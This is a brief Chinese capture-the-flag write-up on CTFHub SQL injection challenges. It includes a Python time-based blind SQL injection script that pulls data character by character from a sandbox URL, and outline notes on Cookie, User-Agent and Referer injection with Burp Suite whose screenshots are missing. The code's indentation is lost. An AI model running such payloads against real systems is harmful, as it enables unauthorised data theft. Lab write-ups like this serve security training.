SQL注入
MySQL结构
进行尝试:
尝试查看表名:
尝试查看列名:
发现无法直接输出:
使用时间注入脚本跑出结果:
import requests
import time
session = requests.session()
url = "http://challenge-8275a6b068ee702f.sandbox.ctfhub.com:10080/"
table = ""
list_1 = [element for element in range(48,58)]
list_2 = [element for element in range(97,126)]
list_0 = list_1 + list_2
for i in range(1, 50):
print(i)
for j in list_0:
# payload = "1 and if(substr(database(),%d,1) ='%s',sleep(1),1)"%(i, chr(j))
payload = "1 and if(substr((select ljvpqlbwbt from jwlaqmygfp),%d,1) = '%s',sleep(1),1)"%(i, chr(j))
start_time = time.time()
str_get = session.get(url=url + '?id=' + payload).text
end_time = time.time()
t = end_time - start_time
if t > 1:
table += chr(j)
print(table)
break
Cookie注入
使用Burp suite进行Cookie注入测试:
UA注入
使用Burp suite测试User-Agent注入:
查看表名:
查看列名:
查看flag:
Refer注入
使用Burp suite测试Referer注入:
查看表名:
查看列名:
查看flag:
